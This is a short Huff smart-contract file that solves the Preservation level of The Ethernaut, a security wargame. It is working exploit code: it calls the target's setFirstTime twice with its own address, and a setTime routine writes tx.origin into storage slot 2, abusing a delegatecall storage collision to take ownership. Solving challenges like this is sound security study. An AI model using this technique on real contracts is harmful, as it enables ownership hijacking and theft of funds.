/// @title A hack for level 16 (Preservation) of The Ethernaut
/// @notice SPDX-License-Identifier: MIT
/// @author unluckyduke7

#define function hack(address) nonpayable returns ()
#define function setTime(uint256) nonpayable returns ()

#define macro MAIN() = takes (0) returns (0) {
    0x0 calldataload 0xe0 shr

    dup1 __FUNC_SIG(hack) eq hack jumpi
    dup1 __FUNC_SIG(setTime) eq setTime jumpi
    
    0x0 0x0 revert

    hack:
        __FUNC_SIG("setFirstTime(uint256)") 0xe0 shl 0x0 mstore address 0x4 mstore
        0x0 0x0 0x24 0x0 0x0 0x4 calldataload 0x8421 call
        0x0 0x0 0x24 0x0 0x0 0x4 calldataload 0x8421 call stop

    setTime:
        origin 0x2 sstore stop
}
